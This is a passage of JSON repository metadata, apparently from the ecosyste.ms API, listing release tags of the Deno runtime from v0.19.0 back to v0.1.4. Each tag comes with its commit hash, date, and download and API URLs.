noland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","ta